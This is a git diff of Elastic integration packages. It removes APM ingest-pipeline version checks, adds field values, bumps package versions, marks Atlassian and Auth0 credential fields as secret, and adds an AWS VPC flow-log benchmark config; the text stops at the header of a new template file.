a/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml index 9f51d990a5f..561239397da 100644 --- a/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- a/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml index 9f51d990a5f..d785a765141 100644 --- a/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml index a44ae0bdc31..64ed586c815 100644 --- a/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml index a44ae0bdc31..75f5c4073ab 100644 --- a/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml index 38e76f8d08c..2e4b1fdac48 100644 --- a/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml index a44ae0bdc31..53db5097aa4 100644 --- a/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_transaction_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_transaction description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml index c1bfda802ec..4b26039a4cf 100644 --- a/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/traces/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM trace events. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/traces/fields/fields.yml b/packages/apm/data_stream/traces/fields/fields.yml index d54cf979d18..d92e6fa00e4 100644 --- a/packages/apm/data_stream/traces/fields/fields.yml +++ b/packages/apm/data_stream/traces/fields/fields.yml @@ -430,3 +430,7 @@ scaling_factor: 1000000 description: | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as scaled_float. +- name: transaction.profiler_stack_trace_ids + type: counted_keyword + description: | + Counted keyword of universal profiling stacktraces IDs captured by the profiler for this transaction. diff --git a/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml index 97a1f0ff7c8..b1096b85d49 100644 --- a/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_10m_metrics/fields/fields.yml @@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml index 97a1f0ff7c8..bcc4af4716d 100644 --- a/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_1m_metrics/fields/fields.yml @@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml index f3145bdac74..b187f99b6b2 100644 --- a/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/transaction_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM transaction metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml b/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml index 97a1f0ff7c8..b07cddfd821 100644 --- a/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/transaction_60m_metrics/fields/fields.yml @@ -1,5 +1,6 @@ - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: faas.coldstart type: boolean @@ -27,6 +28,7 @@ Kubernetes pod name - name: metricset.name type: constant_keyword + value: transaction description: | Name of the set of metrics. - name: processor.event diff --git a/packages/apm/docs/README.md b/packages/apm/docs/README.md index 2f811c4ab19..d2fdc94a31c 100644 --- a/packages/apm/docs/README.md +++ b/packages/apm/docs/README.md @@ -191,6 +191,7 @@ See [APM data streams](https://ela.st/apm-data-streams) for more information. | transaction.message.routing_key | The message routing key | keyword | | | transaction.name | Generic designation of a transaction in the scope of a single service (eg. 'GET /users/:id'). | keyword | | | transaction.name.text | Multi-field of `transaction.name`. | text | | +| transaction.profiler_stack_trace_ids | Counted keyword of universal profiling stacktraces IDs captured by the profiler for this transaction. | counted_keyword | | | transaction.representative_count | The approximate number of transactions represented, based on the inverse sampling rate. | scaled_float | | | transaction.result | The result of the transaction. HTTP status code for HTTP-related transactions. | keyword | | | transaction.sampled | Transactions that are 'sampled' will include all available information. Transactions that are not sampled will not have spans or context. | boolean | | diff --git a/packages/apm/manifest.yml b/packages/apm/manifest.yml index cd87ade59f6..b1bbd3180e9 100644 --- a/packages/apm/manifest.yml +++ b/packages/apm/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.1 +format_version: 3.1.0 name: apm title: Elastic APM -version: 8.13.0-preview-1 +version: 8.13.1-preview-1708411360 description: Monitor, detect, and diagnose complex application performance issues. type: integration categories: ["elastic_stack", "monitoring"] @@ -54,9 +54,13 @@ policy_templates: default: http://localhost:8200 - name: secret_token type: text + # setting false due to https://github.com/elastic/apm-server/issues/11450 + secret: false - name: api_key_enabled type: bool default: false + # secret param is required to pass validation as name contains api_key + secret: false - name: enable_rum type: bool default: true @@ -96,6 +100,8 @@ policy_templates: - name: api_key_limit type: integer default: 100 + # secret param is required to pass validation as name contains api_key + secret: false - name: max_event_bytes type: integer default: 307200 diff --git a/packages/arista_ngfw/changelog.yml b/packages/arista_ngfw/changelog.yml index 9500abd2d6b..9d005b7e430 100755 --- a/packages/arista_ngfw/changelog.yml +++ b/packages/arista_ngfw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/arista_ngfw/manifest.yml b/packages/arista_ngfw/manifest.yml index 2d75018c3ac..025e5de3e5b 100755 --- a/packages/arista_ngfw/manifest.yml +++ b/packages/arista_ngfw/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: arista_ngfw title: "Arista NG Firewall" -version: "1.0.1" +version: "1.1.0" source: license: "Elastic-2.0" description: "Collect logs and metrics from Arista NG Firewall." diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index 8b04f6bf9dc..a35968cfdab 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.22.2" changes: - description: Changed owners diff --git a/packages/atlassian_bitbucket/data_stream/audit/manifest.yml b/packages/atlassian_bitbucket/data_stream/audit/manifest.yml index 9ac09bca15d..ea7531e627c 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/manifest.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/manifest.yml @@ -80,6 +80,7 @@ streams: multi: false required: false show_user: true + secret: true - name: token type: password title: Personal Access Token @@ -87,6 +88,7 @@ streams: required: false multi: false show_user: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml index e51b2b69f65..5418f112afc 100644 --- a/packages/atlassian_bitbucket/manifest.yml +++ b/packages/atlassian_bitbucket/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: atlassian_bitbucket title: Atlassian Bitbucket -version: "1.22.2" +version: "1.23.0" description: Collect logs from Atlassian Bitbucket with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/bitbucket-logo.svg title: Bitbucket Logo diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index af07b21db55..6c2f78ca1d3 100644 --- a/packages/atlassian_confluence/changelog.yml +++ b/packages/atlassian_confluence/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/atlassian_confluence/data_stream/audit/manifest.yml b/packages/atlassian_confluence/data_stream/audit/manifest.yml index f713df4dd04..e84cc2d7b86 100644 --- a/packages/atlassian_confluence/data_stream/audit/manifest.yml +++ b/packages/atlassian_confluence/data_stream/audit/manifest.yml @@ -80,6 +80,7 @@ streams: multi: false required: false show_user: true + secret: true - name: token type: password title: Personal Access Token @@ -87,6 +88,7 @@ streams: required: false multi: false show_user: true + secret: true - name: atlassian_cloud required: true show_user: true diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml index 6837d697aa9..2a69a95862d 100644 --- a/packages/atlassian_confluence/manifest.yml +++ b/packages/atlassian_confluence/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: atlassian_confluence title: Atlassian Confluence -version: "1.23.2" +version: "1.24.0" description: Collect logs from Atlassian Confluence with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/confluence-logo.svg title: Confluence Logo diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index d16e67516bc..760cbed673a 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/atlassian_jira/data_stream/audit/manifest.yml b/packages/atlassian_jira/data_stream/audit/manifest.yml index bca38d19d60..138a6a6eca9 100644 --- a/packages/atlassian_jira/data_stream/audit/manifest.yml +++ b/packages/atlassian_jira/data_stream/audit/manifest.yml @@ -80,6 +80,7 @@ streams: multi: false required: false show_user: true + secret: true - name: token type: password title: Personal Access Token @@ -87,6 +88,7 @@ streams: required: false multi: false show_user: true + secret: true - name: atlassian_cloud required: true show_user: true diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml index e8d4ab5c603..cbf75954b0a 100644 --- a/packages/atlassian_jira/manifest.yml +++ b/packages/atlassian_jira/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: atlassian_jira title: Atlassian Jira -version: "1.23.2" +version: "1.24.0" description: Collect logs from Atlassian Jira with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/jira-software-logo.svg title: Jira Software Logo diff --git a/packages/auditd_manager/changelog.yml b/packages/auditd_manager/changelog.yml index eadd535143a..47ed9ab96e3 100644 --- a/packages/auditd_manager/changelog.yml +++ b/packages/auditd_manager/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.3" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 - version: "1.16.2" changes: - description: Changed owners diff --git a/packages/auditd_manager/manifest.yml b/packages/auditd_manager/manifest.yml index 13e3952ca46..920a5c40d80 100644 --- a/packages/auditd_manager/manifest.yml +++ b/packages/auditd_manager/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: auditd_manager title: "Auditd Manager" -version: "1.16.2" +version: "1.16.3" description: "The Auditd Manager Integration receives audit events from the Linux Audit Framework that is a part of the Linux kernel." type: integration categories: @@ -36,6 +36,9 @@ policy_templates: - type: audit/auditd title: Collect auditd events description: Collecting auditd events +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/auth0/changelog.yml b/packages/auth0/changelog.yml index 0b7d7103d05..a0a8fa2997c 100644 --- a/packages/auth0/changelog.yml +++ b/packages/auth0/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.14.2" changes: - description: Changed owners diff --git a/packages/auth0/data_stream/logs/manifest.yml b/packages/auth0/data_stream/logs/manifest.yml index 0e7b6a206db..1d7a34d5d5c 100644 --- a/packages/auth0/data_stream/logs/manifest.yml +++ b/packages/auth0/data_stream/logs/manifest.yml @@ -30,11 +30,12 @@ streams: show_user: false default: /auth0/logs - name: secret_value - type: text + type: password description: Authorization token multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/auth0/manifest.yml b/packages/auth0/manifest.yml index d3c34b02a9d..3c28fe3fd23 100644 --- a/packages/auth0/manifest.yml +++ b/packages/auth0/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: auth0 title: "Auth0" -version: "1.14.2" +version: "1.15.0" description: Collect logs from Auth0 with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/auth0-screenshot.png title: Auth0 Dashboard diff --git a/packages/aws/_dev/benchmark/rally/ec2logs-benchmark.yml b/packages/aws/_dev/benchmark/rally/ec2_logs-benchmark.yml similarity index 100% rename from packages/aws/_dev/benchmark/rally/ec2logs-benchmark.yml rename to packages/aws/_dev/benchmark/rally/ec2_logs-benchmark.yml diff --git a/packages/aws/_dev/benchmark/rally/ec2metrics-benchmark.yml b/packages/aws/_dev/benchmark/rally/ec2_metrics-benchmark.yml similarity index 100% rename from packages/aws/_dev/benchmark/rally/ec2metrics-benchmark.yml rename to packages/aws/_dev/benchmark/rally/ec2_metrics-benchmark.yml diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml new file mode 100644 index 00000000000..f32864483de --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 aws.vpcflow events ingested +data_stream: + name: vpcflow +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./vpcflow-benchmark/template.ndjson + config: + path: ./vpcflow-benchmark/config.yml + fields: + path: ./vpcflow-benchmark/fields.yml diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml new file mode 100644 index 00000000000..8b138167f7a --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml @@ -0,0 +1,59 @@ +fields: + - name: timestamp + period: -24h + - name: cloud_region + enum: ["ap-east-1", "ap-northeast-1", "ap-northeast-2", "ap-northeast-3", "ap-south-1", "ap-southeast-1", "ap-southeast-2", "ca-central-1", "eu-central-1", "eu-north-1", "eu-west-1", "eu-west-2", "eu-west-3", "me-south-1", "sa-east-1", "us-east-1", "us-east-2", "us-west-1", "us-west-2"] + - name: network_direction + enum: ["ingress", "egress"] + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] + - name: long_num + range: + min: 100000000 + max: 200000000 + - name: aws_vpcflow_version + enum: ["2", "3", "5"] + - name: aws_vpcflow_account_id + range: + min: 100000000000 + max: 300000000000 + - name: aws_vpcflow_action + enum: ["ACCEPT", "REJECT"] + - name: log_status + enum: ["OK", "NODATA", "SKIPDATA"] + - name: aws_vpcflow_tcp_flags + enum: ["0", "1", "2", "3", "4", "18", "19"] + - name: aws_vpcflow_pkt_dst_service + enum: ["AMAZON", "AMAZON_APPFLOW", "AMAZON_CONNECT", "API_GATEWAY", "CHIME_MEETINGS", "CHIME_VOICECONNECTOR", "CLOUD9", "CLOUDFRONT", "CODEBUILD", "DYNAMODB", "EBS", "EC2", "EC2_INSTANCE_CONNECT", "GLOBALACCELERATOR", "KINESIS_VIDEO_STREAMS", "ROUTE53", "ROUTE53_HEALTHCHECKS", "ROUTE53_HEALTHCHECKS_PUBLISHING", "ROUTE53_RESOLVER", "S3", "WORKSPACES_GATEWAYS"] + - name: aws_vpcflow_pkt_src_service + enum: ["AMAZON", "AMAZON_APPFLOW", "AMAZON_CONNECT", "API_GATEWAY", "CHIME_MEETINGS", "CHIME_VOICECONNECTOR", "CLOUD9", "CLOUDFRONT", "CODEBUILD", "DYNAMODB", "EBS", "EC2", "EC2_INSTANCE_CONNECT", "GLOBALACCELERATOR", "KINESIS_VIDEO_STREAMS", "ROUTE53", "ROUTE53_HEALTHCHECKS", "ROUTE53_HEALTHCHECKS_PUBLISHING", "ROUTE53_RESOLVER", "S3", "WORKSPACES_GATEWAYS"] + - name: aws_vpcflow_traffic_path + range: + min: 1 + max: 8 + - name: aws_vpcflow_sublocation_type + enum: ["wavelength", "outpost", "localzone"] + - name: aws_vpcflow_srcport + range: + min: 0 + max: 65535 + - name: aws_vpcflow_dstport + range: + min: 0 + max: 65535 + - name: aws_vpcflow_protocol + enum: ["1", "2", "6", "17", "47", "58", "132"] + - name: aws_vpcflow_packets + range: + min: 0 + max: 100 + - name: aws_vpcflow_bytes + range: + min: 0 + max: 10000 + - name: bucket_num + range: + min: 63461 + max: 63471 diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml new file mode 100644 index 00000000000..8c1bc2982ee --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml @@ -0,0 +1,61 @@ +- name: timestamp + type: date +- name: cloud_region + type: keyword +- name: network_direction + type: keyword +- name: aws_vpcflow_version + type: keyword +- name: aws_vpcflow_account_id + type: long +- name: aws_vpcflow_interface_id + type: keyword +- name: aws_vpcflow_action + type: keyword +- name: log_status + type: keyword +- name: aws_vpcflow_pkt_srcaddr + type: ip +- name: aws_vpcflow_pkt_dstaddr + type: ip +- name: aws_vpcflow_vpc_id + type: keyword +- name: long_num + type: long +- name: aws_vpcflow_subnet_id + type: keyword +- name: aws_vpcflow_tcp_flags + type: keyword +- name: aws_vpcflow_pkt_dst_service + type: keyword +- name: aws_vpcflow_pkt_src_service + type: keyword +- name: aws_vpcflow_traffic_path + type: long +- name: aws_vpcflow_sublocation_type + type: keyword +- name: aws_vpcflow_sublocation_id + type: keyword +- name: aws_vpcflow_srcaddr + type: ip +- name: aws_vpcflow_dstaddr + type: ip +- name: aws_vpcflow_srcport + type: long +- name: aws_vpcflow_dstport + type: long +- name: aws_vpcflow_protocol + type: keyword +- name: aws_vpcflow_packets + type: long +- name: aws_vpcflow_bytes + type: long +- name: duration_start + type: keyword +- name: duration_end + type: keyword +- name: file_name + type: keyword + example: extra-samples +- name: bucket_num + type: long diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson new file mode 100644 index 00000000000..2be8975cf74 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson @@ -0,0 +1,86 